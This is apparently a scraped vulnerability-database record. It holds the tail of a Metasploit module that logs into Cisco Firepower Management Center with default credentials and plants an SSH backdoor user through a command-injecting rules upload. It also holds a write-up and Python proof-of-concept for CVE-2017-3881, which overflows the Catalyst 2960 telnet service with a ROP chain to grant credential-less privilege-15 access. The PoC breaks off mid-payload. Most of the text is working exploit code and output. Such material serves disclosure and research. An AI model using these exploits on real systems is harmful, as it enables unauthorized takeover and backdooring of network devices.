'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n # admin:Admin123 is the default credential for 6.0.1\r\n OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),\r\n OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 
'Admin123']),\r\n OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']),\r\n OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),\r\n OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),\r\n OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\\'s SSH port', 22])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n # For this exploit to work, we need to check two services:\r\n # * HTTP - To create the backdoor account for SSH\r\n # * SSH - To execute our payload\r\n\r\n vprint_status('Checking Cisco Firepower Management console...')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')\r\n })\r\n\r\n if res && res.code == 200\r\n vprint_status(\"Console is found.\")\r\n vprint_status(\"Checking SSH service.\")\r\n begin\r\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\r\n Net::SSH.start(rhost, 'admin',\r\n port: datastore['SSHPORT'],\r\n password: Rex::Text.rand_text_alpha(5),\r\n auth_methods: ['password'],\r\n non_interactive: true\r\n )\r\n end\r\n rescue Timeout::Error\r\n vprint_error('The SSH connection timed out.')\r\n return Exploit::CheckCode::Unknown\r\n rescue Net::SSH::AuthenticationFailed\r\n # Hey, it talked. 
So that means SSH is running.\r\n return Exploit::CheckCode::Appears\r\n rescue Net::SSH::Exception => e\r\n vprint_error(e.message)\r\n end\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def get_sf_action_id(sid)\r\n requirements = {}\r\n\r\n print_status('Attempting to obtain sf_action_id from rulesimport.cgi')\r\n\r\n uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri,\r\n 'cookie' => \"CGISESSID=#{sid}\"\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')\r\n end\r\n\r\n sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]\r\n\r\n unless sf_action_id\r\n fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')\r\n end\r\n\r\n sf_action_id\r\n end\r\n\r\n def create_ssh_backdoor(sid, user, pass)\r\n uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')\r\n sf_action_id = get_sf_action_id(sid)\r\n sh_name = 'exploit.sh'\r\n\r\n print_status(\"Attempting to create an SSH backdoor as #{user}:#{pass}\")\r\n\r\n mime_data = Rex::MIME::Message.new\r\n mime_data.add_part('Import', nil, nil, 'form-data; name=\"action_submit\"')\r\n mime_data.add_part('file', nil, nil, 'form-data; name=\"source\"')\r\n mime_data.add_part('1', nil, nil, 'form-data; name=\"manual_update\"')\r\n mime_data.add_part(sf_action_id, nil, nil, 'form-data; name=\"sf_action_id\"')\r\n mime_data.add_part(\r\n \"sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}\",\r\n 'application/octet-stream',\r\n nil,\r\n \"form-data; name=\\\"file\\\"; filename=\\\"#{sh_name}\\\"\"\r\n )\r\n\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'cookie' => \"CGISESSID=#{sid}\",\r\n 'ctype' => \"multipart/form-data; boundary=#{mime_data.bound}\",\r\n 'data' => mime_data.to_s,\r\n 'vars_get' => { 'no_mojo' => '1' },\r\n })\r\n end\r\n\r\n def 
generate_new_username\r\n datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def generate_new_password\r\n datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def report_cred(opts)\r\n service_data = {\r\n address: rhost,\r\n port: rport,\r\n service_name: 'cisco',\r\n protocol: 'tcp',\r\n workspace_id: myworkspace_id\r\n }\r\n\r\n credential_data = {\r\n origin_type: :service,\r\n module_fullname: fullname,\r\n username: opts[:user],\r\n private_data: opts[:password],\r\n private_type: :password\r\n }.merge(service_data)\r\n\r\n login_data = {\r\n last_attempted_at: DateTime.now,\r\n core: create_credential(credential_data),\r\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\r\n proof: opts[:proof]\r\n }.merge(service_data)\r\n\r\n create_credential_login(login_data)\r\n end\r\n\r\n def do_login\r\n console_user = datastore['USERNAME']\r\n console_pass = datastore['PASSWORD']\r\n uri = normalize_uri(target_uri.path, 'login.cgi')\r\n\r\n print_status(\"Attempting to login in as #{console_user}:#{console_pass}\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_post' => {\r\n 'username' => console_user,\r\n 'password' => console_pass,\r\n 'target' => ''\r\n }\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')\r\n end\r\n\r\n res_cookie = res.get_cookies\r\n if res.code == 302 && res_cookie.include?('CGISESSID')\r\n cgi_sid = res_cookie.scan(/CGISESSID=(\\w+);/).flatten.first\r\n print_status(\"CGI Session ID: #{cgi_sid}\")\r\n print_good(\"Authenticated as #{console_user}:#{console_pass}\")\r\n report_cred(username: console_user, password: console_pass)\r\n return cgi_sid\r\n end\r\n\r\n nil\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n @first_exec = true\r\n cmd.gsub!(/\\/tmp/, '/usr/tmp')\r\n\r\n # Weird hack for the cmd stager.\r\n # Because it keeps using > to write the payload.\r\n if @first_exec\r\n @first_exec = 
false\r\n else\r\n cmd.gsub!(/>>/, ' > ')\r\n end\r\n\r\n begin\r\n Timeout.timeout(3) do\r\n @ssh_socket.exec!(\"#{cmd}\\n\")\r\n vprint_status(\"Executing #{cmd}\")\r\n end\r\n rescue Timeout::Error\r\n fail_with(Failure::Unknown, 'SSH command timed out')\r\n rescue Net::SSH::ChannelOpenFailed\r\n print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')\r\n retry\r\n end\r\n end\r\n\r\n def init_ssh_session(user, pass)\r\n print_status(\"Attempting to log into SSH as #{user}:#{pass}\")\r\n\r\n factory = ssh_socket_factory\r\n opts = {\r\n auth_methods: ['password', 'keyboard-interactive'],\r\n port: datastore['SSHPORT'],\r\n use_agent: false,\r\n config: false,\r\n password: pass,\r\n proxy: factory,\r\n non_interactive: true\r\n }\r\n\r\n opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']\r\n\r\n begin\r\n ssh = nil\r\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\r\n @ssh_socket = Net::SSH.start(rhost, user, opts)\r\n end\r\n rescue Net::SSH::Exception => e\r\n fail_with(Failure::Unknown, e.message)\r\n end\r\n end\r\n\r\n def exploit\r\n # To exploit the useradd vuln, we need to login first.\r\n sid = do_login\r\n return unless sid\r\n\r\n # After login, we can call the useradd utility to create a backdoor user\r\n new_user = generate_new_username\r\n new_pass = generate_new_password\r\n create_ssh_backdoor(sid, new_user, new_pass)\r\n\r\n # Log into the SSH backdoor account\r\n init_ssh_session(new_user, new_pass)\r\n\r\n begin\r\n execute_cmdstager({:linemax => 500})\r\n ensure\r\n @ssh_socket.close\r\n end\r\n end\r\n\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92711", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T11:59:58", "description": "\u8be6\u60c5\u6765\u6e90\uff1ahttps://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/\r\n\r\nDo you still have telnet enabled on your Catalyst switches? 
Think twice, here\u2019s a proof-of-concept remote code execution exploit for a Catalyst 2960 switch with the latest suggested firmware. Check out the exploit code [here](https://github.com/artkond/cisco-rce/). What follows is a detailed write-up of the exploit development process for the vulnerability leaked from CIA\u2019s archive on March 7th 2017 and publicly disclosed by Cisco Systems on March 17th 2017\\. At the time of writing this post there is no patch available. Nonetheless there is a remediation - disable telnet and use SSH instead.\r\n\r\n## Vault 7 CIA leak\r\n\r\nA series of CIA\u2019s documents were leaked on March 7th 2017 and [published](https://wikileaks.org/ciav7p1/) on WikiLeaks. Among other publications there was an interesting preauth code execution vulnerability that affected multiple Cisco switches. This vulnerability is code-named [ROCEM](https://wikileaks.org/ciav7p1/cms/page_20250772.html) in the leaked documents. Although very few technical details were mentioned, a few things stand out.\r\n\r\nThe Vault 7 documents shed light on the testing process for the actual exploit. No exploit source code is available in the leak. Two use cases are highlighted there - the tool can be launched in either interactive mode or set mode. The interactive mode sends the payload via telnet and immediately presents the attacker with a command shell in the context of the same telnet connection. 
Quote from the [doc](https://wikileaks.org/ciav7p1/cms/page_23134373.html):\r\n\r\n\r\n\r\n```\r\nStarted ROCEM interactive session - successful:\r\n\r\n[email\u00a0protected]:/home/user1/ops/adverse/adverse-1r/rocem# ./rocem_c3560-ipbase-mz.122-35.SE5.py -i 192.168.0.254\r\n[+] Validating data/interactive.bin\r\n[+] Validating data/set.bin\r\n[+] Validating data/transfer.bin\r\n[+] Validating data/unset.bin\r\n****************************************\r\nImage: c3560-ipbase-mz.122-35.SE5\r\nHost: 192.168.0.254\r\nAction: Interactive\r\n****************************************\r\nProceed? (y/n)y\r\nTrying 127.0.0.1...\r\n[*] Attempting connection to host 192.168.0.254:23\r\nConnected to 127.0.0.1.\r\nEscape character is '^]'.\r\n[+] Connection established\r\n[*] Starting interactive session\r\nUser Access Verification\r\nPassword:\r\nMLS-Sth#\r\n\r\nMLS-Sth# show priv\r\nCurrent privilege level is 15\r\nMLS-Sth#show users\r\nLine User Host(s) Idle Location\r\n* 1 vty 0 idle 00:00:00 192.168.221.40\r\nInterface User Mode Idle Peer Address\r\nMLS-Sth#exit\r\nConnection closed by foreign host.\r\n\r\n```\r\n\r\n\r\n\r\nSet mode modifies switch memory in order to make any\r\nsubsequent telnet connections passwordless. 
Quote from the [doc](https://wikileaks.org/ciav7p1/cms/page_24969226.html):\r\n\r\n\r\n\r\n```\r\nTest set/unset feature of ROCEM\r\nDUT configured with target configuration and network setup\r\nDUT is accessed by hopping through three flux nodes as per the CONOP\r\nReloaded DUT to start with a clean device\r\nFrom Adverse ICON machine, set ROCEM:\r\n[email\u00a0protected]:/home/user1/ops/adverse/adverse-1r/rocem# ./rocem_c3560-ipbase-mz.122-35.SE5.py -s 192.168.0.254\r\n[+] Validating data/interactive.bin\r\n[+] Validating data/set.bin\r\n[+] Validating data/transfer.bin\r\n[+] Validating data/unset.bin\r\n\r\n****************************************\r\nImage: c3560-ipbase-mz.122-35.SE5\r\nHost: 192.168.0.254\r\nAction: Set\r\n****************************************\r\n\r\nProceed? 
(y/n)y\r\n[*] Attempting connection to host 192.168.0.254:23\r\n[+] Connection established\r\n[*] Sending Protocol Step 1\r\n[*] Sending Protocol Step 2\r\n[+] Done\r\n[email\u00a0protected]:/home/user1/ops/adverse/adverse-1r/rocem#\r\n\r\nVerified I could telnet and rx priv 15 without creds:\r\n\r\n[email\u00a0protected]:/home/user1/ops/adverse/adverse-1r/rocem# telnet 192.168.0.254\r\nTrying 192.168.0.254...\r\nConnected to 192.168.0.254.\r\nEscape character is '^]'.\r\n\r\nMLS-Sth#\r\n\r\nMLS-Sth#show priv\r\nCurrent privilege level is 15\r\nMLS-Sth#\r\n\r\n```\r\n\r\n\r\n\r\nOne piece of information that was useful to me in researching this vulnerability was the telnet debug output. Quote from the [doc](https://wikileaks.org/ciav7p1/cms/page_17760327.html):\r\n\r\n\r\n\r\n```\r\n14\\. 
Confirm Xetron EAR 5355 - Debug telnet causes anomalous output \r\n 1.Enabled debug telnet on DUT\r\n 2.Set ROCEM\r\n 3.Observed the following:\r\n 000467: Jun 3 13:54:09.330: TCP2: Telnet received WILL TTY-SPEED (32) (refused)\r\n 000468: Jun 3 13:54:09.330: TCP2: Telnet sent DONT TTY-SPEED (32)\r\n 000469: Jun 3 13:54:09.330: TCP2: Telnet received WILL LOCAL-FLOW (33) (refused)\r\n 000470: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LOCAL-FLOW (33)\r\n 000471: Jun 3 13:54:09.330: TCP2: Telnet received WILL LINEMODE (34)\r\n 000472: Jun 3 13:54:09.330: TCP2: Telnet sent DONT LINEMODE (34) (unimplemented)\r\n 000473: Jun 3 13:54:09.330: TCP2: Telnet received WILL NEW-ENVIRON (39)\r\n 000474: Jun 3 13:54:09.330: TCP2: Telnet sent DONT NEW-ENVIRON (39) (unimplemented)\r\n 000475: Jun 3 13:54:09.330: TCP2: Telnet received DO STATUS (5)\r\n 000476: Jun 3 13:54:09.330: TCP2: Telnet sent WONT STATUS (5) (unimplemented)\r\n 000477: Jun 3 13:54:09.330: TCP2: Telnet received WILL X-DISPLAY (35) (refused)\r\n 000478: Jun 3 13:54:09.330: TCP2: Telnet sent DONT X-DISPLAY (35)\r\n 000479: Jun 3 13:54:09.330: TCP2: Telnet received DO ECHO (1)\r\n 000480: Jun 3 13:54:09.330: Telnet2: recv SB NAWS 116 29\r\n 000481: Jun 3 13:54:09.623: Telnet2: recv SB 36 92 OS^K'zAuk,Fz90X\r\n 000482: Jun 3 13:54:09.623: Telnet2: recv SB 36 0 ^CCISCO_KITS^Ap\r\n\r\n```\r\n\r\n\r\nNote the `CISCO_KITS` option received by the service on the last line. This proved to be an important string.\r\n\r\n## Cisco advisory\r\n\r\nOn March 17th 2017 Cisco Systems [disclosed](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp) a vulnerability present in their switches. 
This disclosure was based on the documents from Vault 7:\r\n\r\n> A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges.\r\n\r\nNot many details were available at the time of writing this article, except for the following paragraph:\r\n\r\n> The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors:\r\n> \r\n> * The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device, and\r\n> * The incorrect processing of malformed CMP-specific Telnet options.\r\n\r\nLong story short, the vulnerability allows an attacker to exploit the telnet service to gain remote code execution on the target switch. But in order to make any use of this advisory I needed more information on the matter. So I decided to dig deeper into the Cisco Cluster Management Protocol.\r\n\r\n## Switch clustering\r\n\r\nAll right! I had two Catalyst 2960 switches for researching this vulnerability. Clustering sets up a master-slave relation between switches. The master switch is able to get a privileged command shell on the slave. As Cisco mentioned in its advisory, telnet is used as a command protocol between cluster members. Some info on clustering can be found [here](http://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst3750x_3560x/software/release/12-2_55_se/configuration/guide/3750xscg/swclus.pdf) and [here\u2019s](https://slaptijack.com/networking/cisco-catalyst-configuration-using-cluster-commands/) an example of setting up a cluster environment.\r\n\r\nNow to look for cluster traffic between them. 
The following should be in the master switch config:\r\n\r\n\r\n\r\n```\r\ncluster enable CLGRP 0\r\ncluster member 1 mac-address xxxx.xxxx.xxxx\r\n\r\n```\r\n\r\n\r\n\r\nThis will add a nearby switch as a cluster slave. `rcommand <num>` allows getting a command interface on a slave switch from the master\u2019s interface. This is expected by design.\r\n\r\n\r\n```\r\ncatalyst1>rcommand 1\r\ncatalyst2>who\r\n Line User Host(s) Idle Location\r\n* 1 vty 0 idle 00:00:00 10.10.10.10\r\n\r\n Interface User Mode Idle Peer Address\r\n\r\n```\r\n\r\n\r\nLet\u2019s look at the traffic generated by `rcommand`:\r\n\r\n\r\n\r\nHey! Where da hell is telnet traffic? The advisory clearly states:\r\n\r\n> The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members.\r\n\r\nOk, running `show version` to see some more traffic:\r\n\r\n\r\n```\r\ncatalyst2>show version\r\nCisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE1, RELEASE SOFTWARE (fc1)\r\n\r\n```\r\n\r\n\r\nAha! Telnet traffic is actually being encapsulated into layer 2 LLC packets. If we look close enough we will notice IP packets inside with chopped MAC addresses in the source and destination fields. Inside those \u201cIP\u201d packets reside valid TCP segments carrying a telnet session.\r\n\r\n\r\n\r\nA telnet session is usually preceded by negotiating telnet options. Among them are: terminal size, terminal type etc. Take a look at the [RFC](https://tools.ietf.org/html/rfc854) for more info.\r\n\r\nRight before being presented with the welcome `catalyst2>` message an interesting telnet option is transferred to the server side:\r\n\r\n\r\n\r\nHere you can see a telnet option \u201cCISCO_KITS\u201d sent from the master switch to the slave. The very same string present in the Vault 7 documents during the execution of the exploit. 
Time to take a closer look at the switch internals.\r\n\r\n## Peeking at firmware\r\n\r\nFirmware is located at `flash:<version>.bin` on the switch.\r\n\r\n\r\n```\r\ncatalyst2#dir flash:\r\nDirectory of flash:/\r\n\r\n 2 -rwx 9771282 Mar 1 1993 00:13:28 +00:00 c2960-lanbasek9-mz.122-55.SE1.bin\r\n 3 -rwx 2487 Mar 1 1993 00:01:53 +00:00 config.text\r\n\r\n```\r\n\r\n\r\nThe built-in ftp client allows transferring this firmware to an arbitrary ftp server. Ok, now to analyze and extract the contents of the file with [binwalk](https://github.com/devttys0/binwalk):\r\n\r\n\r\n```\r\n$ binwalk -e c2960-lanbasek9-mz.122-55.SE1.bin \r\n\r\nDECIMAL HEXADECIMAL DESCRIPTION\r\n--------------------------------------------------------------------------------\r\n112 0x70 bzip2 compressed data, block size = 900k\r\n\r\n```\r\n\r\n\r\nIn order to facilitate static analysis of the resulting binary we had better know the firmware load offset. This offset is printed to the serial console during the boot process:\r\n\r\n\r\n```\r\nLoading \"flash:c2960-lanbasek9-mz.122-55.SE1.bin\"...@@@@@@@@@@@@@@@@@@@@@@\r\nFile \"flash:c2960-lanbasek9-mz.122-55.SE1.bin\" uncompressed and installed,\r\nentry point: 0x3000\r\nexecuting...\r\n\r\n```\r\n\r\n\r\nFire up IDA and let\u2019s roll. The CPU architecture is PowerPC 32-bit big-endian. Load the binary at 0x3000:\r\n\r\n\r\n\r\n### Discovering strings\r\n\r\nRemember the `CISCO_KITS` string in the cluster traffic I captured before? This was my starting point. After discovering most of the functions in IDA, I was able to see the cross-references to the strings located at the end of the firmware.\r\n\r\n\r\n\r\nThe \u201cCISCO_KITS\u201d string is referenced by the `return_cisco_kits` function, which just returns this string as `char *`. 
We will focus our attention on the `call_cisco_kits` function at `0x0004ED8C` which calls `return_cisco_kits`.\r\n\r\n\r\n\r\nBecause the telnet code is rather symmetrical for client and server, here we can actually see the format of the buffer that is being sent to the server side - `%c%s%c%d:%s:%d:`. This goes in line with the observed traffic where the sent buffer was `\\x03CISCO_KITS\\x012::1:`\r\n\r\n\r\n\r\n```\r\nif ( telnet_struct->is_client_mode ) // client mode? then send \"CISCO_KITS\" string\r\n{\r\n if ( telnet_struct->is_client_mode == 1 )\r\n {\r\n cisco_kits_string_2 = (char *)return_cisco_kits();\r\n int_two = return_2();\r\n tty_str = get_from_tty_struct((telnet_struct *)telnet_struct_arg->tty_struct);\r\n *(_DWORD *)&telnet_struct_arg->tty_struct[1].field_6D1;\r\n format1_ret = format_1(\r\n 128,\r\n (int)&str_buf[8],\r\n \"%c%s%c%d:%s:%d:\",\r\n 3,\r\n cisco_kits_string_2,\r\n 1,\r\n int_two,\r\n tty_str,\r\n 0);\r\n telnet_struct = (telnet_struct *)telnet_send_sb(\r\n (int)telnet_struct_arg,\r\n 36,\r\n 0,\r\n &str_buf[8],\r\n format1_ret,\r\n v8,\r\n v7,\r\n v6);\r\n }\r\n}\r\n\r\n```\r\n\r\n\r\nNotice something? There are two `%s` string specifiers but only one string is actually present in the traffic sample, which is `CISCO_KITS`; the second one is empty and is confined between two `:` chars. Further observing the control flow of the very same function I noticed some funny behaviour when dealing with the second string (this time the server-side portion of the code):\r\n\r\n```\r\nfor ( j = (unsigned __int8)*string_buffer; j != ':'; j = (unsigned __int8)*string_buffer )// put data before second \":\" at &str_buf + 152\r\n{\r\n str_buf[v19++ + 152] = j;\r\n ++string_buffer;\r\n}\r\n\r\n```\r\n\r\n\r\nThe data we sent over in the second %s string is actually copied until the `:` char without checking the destination boundaries, while the target buffer resides on the stack. What does this look like? Correct! 
~~Buffalo~~ buffer overflow!\r\n\r\n\r\n\r\n## Getting code execution\r\n\r\nGetting control of the instruction pointer was easy as it was overwritten with the buffer I sent (btw I used [IODIDE](https://github.com/nccgroup/IODIDE) for debugging). The problem was that the heap and the stack (which resides on the heap) were not executable. My best bet is that this is actually the effect of data and instruction caches being enabled. Here\u2019s a slide from Felix Lindner\u2019s [presentation](https://www.blackhat.com/presentations/bh-usa-09/LINDNER/BHUSA09-Lindner-RouterExploit-SLIDES.pdf) at BlackHat 2009:\r\n\r\n\r\n\r\n### ROPing a way out\r\n\r\nSince there wasn\u2019t a way to execute code on the stack I had to use it as a data buffer and reuse existing code in the firmware. The idea is to chain function epilogues in a meaningful way to perform arbitrary memory writes. But wait, write what? Take a look at the decompiled function at `0x00F47A34`:\r\n\r\n\r\n```\r\nif ( ptr_is_cluster_mode(tty_struct_var->telnet_struct_field) )\r\n{\r\n telnet_struct_var = tty_struct_var->telnet_struct_field;\r\n ptr_get_privilege_level = (int (__fastcall *)(int))some_libc_func(0, (unsigned int *)&dword_22659D4[101483]);\r\n privilege_level = ptr_get_privilege_level(telnet_struct_var);// equals to 1 during rcommand 1\r\n telnet_struct_1 = tty_struct_var->telnet_struct_field;\r\n ptr_telnet_related2 = (void (__fastcall *)(int))some_libc_func(1u, (unsigned int *)&dword_22659D4[101487]);\r\n ptr_telnet_related2(telnet_struct_1);\r\n *(_DWORD *)&tty_struct_var->privilege_level_field = ((privilege_level << 28) & 0xF0000000 | *(_DWORD *)&tty_struct_var->privilege_level_field & 0xFFFFFFF) & 0xFF7FFFFF;\r\n}\r\nelse\r\n{\r\n //generic telnet session\r\n}\r\n\r\n```\r\n\r\n\r\nInteresting things happen here. The first thing to emphasize is that both calls, `ptr_is_cluster_mode` and `ptr_get_privilege_level`, are made indirectly by referencing global variables. 
Check the line at address `0x00F47B60` - the `is_cluster_mode` function address is being loaded from the dword at `0x01F24A7`. In a similar way the address of `get_privilege_level` is being loaded from the `r3` register at `0x00F47B8C`. At this point the `r3` contents are a dereferenced pointer residing at address `0x022659D4 + 0x28 + 0xC`.\r\n\r\n\r\n\r\nIf the `ptr_is_cluster_mode` call returns non-zero and the `ptr_get_privilege` call returns a value that differs from -1 we will be presented with a telnet shell without the need to provide any credentials. The variable `privilege_level` is being checked for its value further down the code:\r\n\r\n\r\n\r\nWhat if I could overwrite these function pointers with something that always returns the desired positive value? Since the stack and heap weren\u2019t directly executable I had to reuse the existing code to perform such memory writes. The following [ROP](https://en.wikipedia.org/wiki/Return-oriented_programming) gadgets were used:\r\n\r\n\r\n```\r\n0x000037b4: \r\n lwz r0, 0x14(r1)\r\n mtlr r0\r\n lwz r30, 8(r1)\r\n lwz r31, 0xc(r1)\r\n addi r1, r1, 0x10 \r\n blr\r\n\r\n```\r\n\r\n\r\nLoad the `is_cluster_mode` function pointer into `r30`, and load the value to overwrite this pointer with into `r31`. The value to overwrite with is the address of a function that always returns 1:\r\n\r\n\r\n\r\n\r\n```\r\n0x00dffbe8: \r\n stw r31, 0x34(r30)\r\n lwz r0, 0x14(r1)\r\n mtlr r0\r\n lmw r30, 8(r1)\r\n addi r1, r1, 0x10\r\n blr\r\n\r\n```\r\n\r\n\r\nPerform the actual write.\r\n\r\n\r\n```\r\n0x0006788c: \r\n lwz r9, 8(r1)\r\n lwz r3, 0x2c(r9)\r\n lwz r0, 0x14(r1)\r\n mtlr r0\r\n addi r1, r1, 0x10\r\n blr\r\n\r\n```\r\n\r\n```\r\n0x006ba128: \r\n lwz r31, 8(r1)\r\n lwz r30, 0xc(r1)\r\n addi r1, r1, 0x10\r\n lwz r0, 4(r1)\r\n mtlr r0\r\n blr\r\n\r\n```\r\n\r\n\r\nThe previous two gadgets load a pointer to the `get_privilege_level` function into `r3`, and the value to overwrite it with into `r31`. 
The target value is a function that returns 15 (could\u2019ve used this function for both writes tho):\r\n\r\n\r\n\r\n```\r\n0x0148e560: \r\n stw r31, 0(r3)\r\n lwz r0, 0x14(r1)\r\n mtlr r0\r\n lwz r31, 0xc(r1)\r\n addi r1, r1, 0x10\r\n blr\r\n\r\n```\r\n\r\n\r\nThis epilogue makes the final write and returns to the legitimate execution flow. Of course, the stack frame should be formed accordingly to make this ROP chain work. Check out the exploit [source](https://github.com/artkond/cisco-rce/blob/master/c2960-lanbasek9-m-12.2.55.se1.py) to see the actual stack layout for this chain to work as intended.\r\n\r\n### Running the exploit\r\n\r\nAt the end of the day I ended up with a tool with the ability to patch the function pointers responsible for credential-less connection and privilege level. Note that the exploit code is heavily dependent on the exact firmware version used on the switch. Using the exploit code against a different firmware will most probably crash the device.\r\n\r\nI used the knowledge from static and dynamic analysis of the older firmware SE1 to build an exploit for the latest suggested firmware 12.2(55)SE11\\. The only difference between the firmware versions is the function and pointer offsets. Also, the way the exploit works makes it easy to revert the changes. 
Example:\r\n\r\n\r\n```\r\n$ python c2960-lanbasek9-m-12.2.55.se11.py 192.168.88.10 --set\r\n[+] Connection OK\r\n[+] Recieved bytes from telnet service: '\\xff\\xfb\\x01\\xff\\xfb\\x03\\xff\\xfd\\x18\\xff\\xfd\\x1f'\r\n[+] Sending cluster option\r\n[+] Setting credless privilege 15 authentication\r\n[+] All done\r\n$ telnet 192.168.88.10\r\nTrying 192.168.88.10...\r\nConnected to 192.168.88.10.\r\nEscape character is '^]'.\r\n\r\ncatalyst1#show priv\r\nCurrent privilege level is 15\r\ncatalyst1#show ver\r\nCisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE (fc3)\r\n...\r\n\r\nSystem image file is \"flash:c2960-lanbasek9-mz.122-55.SE11.bin\"\r\n\r\n...\r\n\r\ncisco WS-C2960-48TT-L (PowerPC405) processor (revision B0) with 65536K bytes of memory.\r\n...\r\nModel number : WS-C2960-48TT-L\r\n...\r\n\r\nSwitch Ports Model SW Version SW Image \r\n------ ----- ----- ---------- ---------- \r\n* 1 50 WS-C2960-48TT-L 12.2(55)SE11 C2960-LANBASEK9-M \r\n\r\nConfiguration register is 0xF\r\n\r\n```\r\n\r\n\r\nTo unset this behaviour:\r\n\r\n\r\n```\r\n$ python c2960-lanbasek9-m-12.2.55.se11.py 192.168.88.10 --unset\r\n[+] Connection OK\r\n[+] Recieved bytes from telnet service: '\\xff\\xfb\\x01\\xff\\xfb\\x03\\xff\\xfd\\x18\\xff\\xfd\\x1f\\r\\ncatalyst1#'\r\n[+] Sending cluster option\r\n[+] Unsetting credless privilege 15 authentication\r\n[+] All done\r\n$ telnet 192.168.88.10\r\nEscape character is '^]'.\r\n\r\nUser Access Verification\r\n\r\nPassword: \r\n\r\n```\r\n\r\nThis RCE POC is available [here](https://github.com/artkond/cisco-rce/) for both firmware versions. 
A DoS version of this exploit is [available](https://github.com/artkond/cisco-rce/blob/master/ios_telnet_rocem.rb) as a Metasploit module; it might work for most models mentioned in the Cisco advisory.", "cvss3": {}, "published": "2017-04-10T00:00:00", "type": "seebug", "title": "Cisco IOS and IOS XE Software Cluster Management Protocol Remote Code Execution Vulnerability (CVE-2017-3881)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2017-04-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92932", "id": "SSV:92932", "sourceData": "\n # c2960-lanbasek9-m-12.2.55.se11.py\r\n# Full PoC reference: https://github.com/artkond/cisco-rce/\r\n#!/usr/bin/python\r\n# Author:\r\n# Artem Kondratenko (@artkond)\r\n\r\nimport socket\r\nimport sys\r\nfrom time import sleep\r\n\r\nset_credless = True\r\n\r\nif len(sys.argv) < 3:\r\n\tprint sys.argv[0] + ' [host] --set/--unset'\r\n\tsys.exit()\r\nelif sys.argv[2] == '--unset':\r\n\tset_credless = False\r\nelif sys.argv[2] == '--set':\r\n\tpass\r\nelse:\r\n\tprint sys.argv[0] + ' [host] --set/--unset'\r\n\tsys.exit()\r\n\r\n\r\ns = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((sys.argv[1], 23))\r\n\r\nprint '[+] Connection OK'\r\nprint '[+] Recieved bytes from telnet service:', repr(s.recv(1024))\r\n#sleep(0.5)\r\nprint '[+] Sending cluster option'\r\n\r\nprint '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'\r\n\r\n\r\n\r\npayload = '\\xff\\xfa\\x24\\x00'\r\npayload += '\\x03CISCO_KITS\\x012:'\r\npayload += 'A' * 116\r\npayload += '\\x00\\x00\\x37\\xb4'\t\t# first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;\r\n#next bytes are shown as offsets from r1\r\npayload += '\\x02\\x3d\\x55\\xdc'\t\t# +8 address of pointer to is_cluster_mode function - 0x34\r\nif set_credless is True:\r\n\tpayload += 
